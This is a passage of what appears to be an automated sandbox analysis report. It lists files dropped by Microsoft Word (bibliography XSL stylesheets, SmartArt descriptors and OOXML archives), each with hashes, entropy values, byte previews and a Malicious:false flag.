                                                                                                                                                                                                                                                                                                                                                                          Preview:PK.........A;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........pnB;.M.:....g......._rels/.rels...J.0.._%.n....xp..,{.i2M.........G..........7...3o/.......d.kyU....^..[>Q....j.#P.H......Z>..+!...B*|@...G...E....E]..".3.......!..7....,:..,.......Ot..0r....Z..&1..U..p.U-.[Uq&.......................Gyy.}n.(.C(i.x........?.vM..}..%.7.b.>L..]..PK........EV:5K..4....H......diagrams/layout1.xml.Yo.6........S.`......$M...Q8A...R..T.k...K.4CQG..}.A..9.?R....!&...Q..ZW.......Q....<8..z..g....4{d.>..;.{.>.X.....Y.2.......cR....9e.. ...}L.....yv&.&...r..h...._..M. e...[..}.>.k..........3.`.ygN...7.w..3..W.S.....w9....r(....Zb..1....z...&WM.D<......D9...ge......6+.Y....$f......wJ$O..N..FC..Er........?..is...-Z
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):332
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.547857457374301
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:fxnxUXSpGLMeKlPaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyipTIw9eNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                                                                                                                                                                                                                                          MD5:4EC6724CBBA516CF202A6BD17226D02C
                                                                                                                                                                                                                                                                                                                                                                          SHA1:E412C574D567F0BA68B4A31EDB46A6AB3546EA95
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:18E408155A2C2A24D91CD45E065927FFDA726356AAB115D290A3C1D0B7100402
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:DE45011A084AB94BF5B27F2EC274D310CF68DF9FB082E11726E08EB89D5D691EA086C9E0298E16AE7AE4B23753E5916F69F78AAD82F4627FC6F80A6A43D163DB
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .h.a.r.v.a.r.d.a.n.g.l.i.a.2.0.0.8.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):284415
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.00549404077789
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:N9G5o7Fv0ZcxrStAtXWty8zRLYBQd8itHiYYPVJHMSo27hlwNR57johqBXlwNR2b:y
                                                                                                                                                                                                                                                                                                                                                                          MD5:33A829B4893044E1851725F4DAF20271
                                                                                                                                                                                                                                                                                                                                                                          SHA1:DAC368749004C255FB0777E79F6E4426E12E5EC8
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:C40451CADF8944A9625DD690624EA1BA19CECB825A67081E8144AD5526116924
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:41C1F65E818C2757E1A37F5255E98F6EDEAC4214F9D189AD09C6F7A51F036768C1A03D6CFD5845A42C455EE189D13BB795673ACE3B50F3E1D77DAFF400F4D708
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2008</xsl:text>.....</xsl:when>.... <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <x
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):278
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.5280239200222887
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:fxnxUXQAl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyllNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                                                                                                                                                                                                                                          MD5:877A8A960B2140E3A0A2752550959DB9
                                                                                                                                                                                                                                                                                                                                                                          SHA1:FBEC17B332CBC42F2F16A1A08767623C7955DF48
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:FE07084A41CF7DB58B06D2C0D11BCACB603D6574261D1E7EBADCFF85F39AFB47
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:B8B660374EC6504B3B5FCC7DAC63AF30A0C9D24306C36B33B33B23186EC96AEFE958A3851FF3BC57FBA72A1334F633A19C0B8D253BB79AA5E5AFE4A247105889
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.b...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):268317
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.05419861997223
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:JwprAJLR95vtfb8p4bgWPzDCvCmvQursq7vImej/yQzSS1apSiQhHDOruvoVeMUh:N9
                                                                                                                                                                                                                                                                                                                                                                          MD5:51D32EE5BC7AB811041F799652D26E04
                                                                                                                                                                                                                                                                                                                                                                          SHA1:412193006AA3EF19E0A57E16ACF86B830993024A
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:6230814BF5B2D554397580613E20681752240AB87FD354ECECF188C1EABE0E97
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:5FC5D889B0C8E5EF464B76F0C4C9E61BDA59B2D1205AC9417CC74D6E9F989FB73D78B4EB3044A1A1E1F2C00CE1CA1BD6D4D07EEADC4108C7B124867711C31810
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):292
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.5026803317779778
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:fxnxUXC89ADni8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyf9ADiNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                                                                                                                                                                                                                                          MD5:A0D51783BFEE86F3AC46A810404B6796
                                                                                                                                                                                                                                                                                                                                                                          SHA1:93C5B21938DA69363DBF79CE594C302344AF9D9E
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:47B43E7DBDF8B25565D874E4E071547666B08D7DF4D736EA8521591D0DED640F
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:CA3DB5A574745107E1D6CAA60E491F11D8B140637D4ED31577CC0540C12FDF132D8BC5EBABEA3222F4D7BA1CA016FF3D45FE7688D355478C27A4877E6C4D0D75
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.o.s.t.t.i.t.l.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):251032
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.102652100491927
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:hwprA5R95vtfb8p4bgWPwW6/m26AnV9IBgIkqm6HITUZJcjUZS1XkaNPQTlvB2zr:JA
                                                                                                                                                                                                                                                                                                                                                                          MD5:F425D8C274A8571B625EE66A8CE60287
                                                                                                                                                                                                                                                                                                                                                                          SHA1:29899E309C56F2517C7D9385ECDBB719B9E2A12B
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:DD7B7878427276AF5DBF8355ECE0D1FE5D693DF55AF3F79347F9D20AE50DB938
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:E567F283D903FA533977B30FD753AA1043B9DDE48A251A9AC6777A3B67667443FEAD0003765A630D0F840B6C275818D2F903B6CB56136BEDCC6D9BDD20776564
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):286
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.538396048757031
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:fxnxUXcel8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyMelNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                                                                                                                                                                                                                                          MD5:149948E41627BE5DC454558E12AF2DA4
                                                                                                                                                                                                                                                                                                                                                                          SHA1:DB72388C037F0B638FCD007FAB46C916249720A8
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:1B981DC422A042CDDEBE2543C57ED3D468288C20D280FF9A9E2BB4CC8F4776ED
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:070B55B305DB48F7A8CD549A5AECF37DE9D6DCD780A5EC546B4BB2165AF4600FA2AF350DDDB48BECCAA3ED954AEE90F5C06C3183310B081F555389060FF4CB01
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .s.i.s.t.0.2...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):250983
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.057714239438731
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:JwprA6OS95vtfb8p4bgWPzkhUh9I5/oBRSifJeg/yQzvapSiQhHZeruvoXMUw3im:uP
                                                                                                                                                                                                                                                                                                                                                                          MD5:F883B260A8D67082EA895C14BF56DD56
                                                                                                                                                                                                                                                                                                                                                                          SHA1:7954565C1F243D46AD3B1E2F1BAF3281451FC14B
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:EF4835DB41A485B56C2EF0FF7094BC2350460573A686182BC45FD6613480E353
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:D95924A499F32D9B4D9A7D298502181F9E9048C21DBE0496FA3C3279B263D6F7D594B859111A99B1A53BD248EE69B867D7B1768C42E1E40934E0B990F0CE051E
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):4026
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.809492693601857
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:96:VpDCBFLhxaUGm5EWA07yNdKH1FQpy8tnX8Iz3b7TrT502+fPD:VpDYFFRMNU+RtXzLf35t+3D
                                                                                                                                                                                                                                                                                                                                                                          MD5:5D9BAD7ADB88CEE98C5203883261ACA1
                                                                                                                                                                                                                                                                                                                                                                          SHA1:FBF1647FCF19BCEA6C3CF4365C797338CA282CD2
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:8CE600404BB3DB92A51B471D4AB8B166B566C6977C9BB63370718736376E0E2F
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:7132923869A3DA2F2A75393959382599D7C4C05CA86B4B27271AB9EA95C7F2E80A16B45057F4FB729C9593F506208DC70AF2A635B90E4D8854AC06C787F6513D
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK........YnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........bnB;?.......f......._rels/.rels...J.1.._%..f....m/.,x...&.lt.dV.y.|.."v....q..|......r..F..)..;.T5g.eP..O..Z.^-.8...<.Y....Q.."....*D.%.!9.R&#".'0(.u}).!..l....b..J..rr....P.L.w..0.-......A..w..x.7U...Fu<mT.....^s...F./ ..( .4L..`.....}...O..4.L...+H.z...m..j[].=........oY}.PK........J.L6...m....,.......diagrams/layout1.xml.X.n.8.}N.....PG.............wZ.,.R.%.K...J.H]....y.3..9...O..5."J.1.\.1....Q....z......e.5].)...$b.C)...Gx!...J3..N..H...s....9.~...#..$...W.8..I`|..0xH}......L.|..(V;..1...kF..O=...j...G.X.....T.,d>.w.Xs.......3L.r..er\o..D..^....O.F.{:.>.R'....Y-...B.P.;....X.'c...{x*.M7..><l.1.w..{].46.>.z.E.J.......G......Hd..$..7....E.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):250
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.4916022431157345
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:fxnxUXsAl8xoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny8A8xoGHmD0+dAH/luWvv
                                                                                                                                                                                                                                                                                                                                                                          MD5:1A314B08BB9194A41E3794EF54017811
                                                                                                                                                                                                                                                                                                                                                                          SHA1:D1E70DB69CA737101524C75E634BB72F969464FF
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:9025DD691FCAD181D5FD5952C7AA3728CD8A2CAF20DEA14930876419BED9B379
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:AB29C8674A85711EABAE5F9559E9048FE91A2F51EB12D5A46152A310DE59F759DF8C617DA248798A7C20F60E26FBB1B0FC8DB47C46B098BCD26CF8CE78989ACA
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.r.a.c.k.e.t.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):16806
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.9519793977093505
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:384:eSMjhqgJDGwOzHR3iCpK+QdLdfufFJ9aDn9LjDMVAwHknbz7OW:eSkhqglGwERSAHQdLhDn9AKokv7H
                                                                                                                                                                                                                                                                                                                                                                          MD5:950F3AB11CB67CC651082FEBE523AF63
                                                                                                                                                                                                                                                                                                                                                                          SHA1:418DE03AD2EF93D0BD29C3D7045E94D3771DACB4
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:9C5E4D8966A0B30A22D92DB1DA2F0DBF06AC2EA75E7BB8501777095EA0196974
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:D74BF52A58B0C0327DB9DDCAD739794020F00B3FA2DE2B44DAAEC9C1459ECAF3639A5D761BBBC6BDF735848C4FD7E124D13B23964B0055BB5AA4F6AFE76DFE00
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........Ul.<..<"I5...&......diagrams/layout1.xml.}.r.I..s........~Y.f.gzfv......E."w.K..J5m.e...4.0..Q... A.!...%...<...3.......O.......t~.u{...5.G......?,.........N......L......~.:....^,..r=./~7_..8............o.y......oo.3.f........f.......r.7../....qrr.v9.......,?..._O.....?9.O~]..zv.I'.W..........;..\..~....../........?~..n.....\}pt.........b,~...;>.=;>:..u.....?.......2]..]....i......9..<.p..4D..
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):254
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.4720677950594836
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:fxnxUXOu9+MlWlk2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnycMlWlzGHmD0+dAH/luWvv
                                                                                                                                                                                                                                                                                                                                                                          MD5:D04EC08EFE18D1611BDB9A5EC0CC00B1
                                                                                                                                                                                                                                                                                                                                                                          SHA1:668FF6DFE64D5306220341FC2C1353199D122932
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:FA60500F951AFAF8FFDB6D1828456D60004AE1558E8E1364ADC6ECB59F5450C9
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:97EBCCAF64FA33238B7CFC0A6D853EFB050D877E21EE87A78E17698F0BB38382FCE7F6C4D97D550276BD6B133D3099ECAB9CFCD739F31BFE545F4930D896EEC3
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.i.r.c.l.e.P.r.o.c.e.s.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):256
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.4842773155694724
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:fxnxUXDAlIJAFIloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyMlI7loGHmD0+dAH/luWvv
                                                                                                                                                                                                                                                                                                                                                                          MD5:923D406B2170497AD4832F0AD3403168
                                                                                                                                                                                                                                                                                                                                                                          SHA1:A77DA08C9CB909206CDE42FE1543B9FE96DF24FB
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:EBF9CF474B25DDFE0F6032BA910D5250CBA2F5EDF9CF7E4B3107EDB5C13B50BF
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:A4CD8C74A3F916CA6B15862FCA83F17F2B1324973CCBCC8B6D9A8AEE63B83A3CD880DC6821EEADFD882D74C7EF58FA586781DED44E00E8B2ABDD367B47CE45B7
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.o.n.v.e.r.g.i.n.g.T.e.x.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):11380
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.891971054886943
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:192:VJcnLYnAVbOFLaCPLrGGbhaWEu6d3RmryqLkeAShObPb1AYcRMMXjkfa0nYBwggD:VcMC8lLrRbhy1ZqLyShYb1FHQ4C0nYQJ
                                                                                                                                                                                                                                                                                                                                                                          MD5:C9F9364C659E2F0C626AC0D0BB519062
                                                                                                                                                                                                                                                                                                                                                                          SHA1:C4036C576074819309D03BB74C188BF902D1AE00
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:6FC428CA0DCFC27D351736EF16C94D1AB08DDA50CB047A054F37EC028DD08AA2
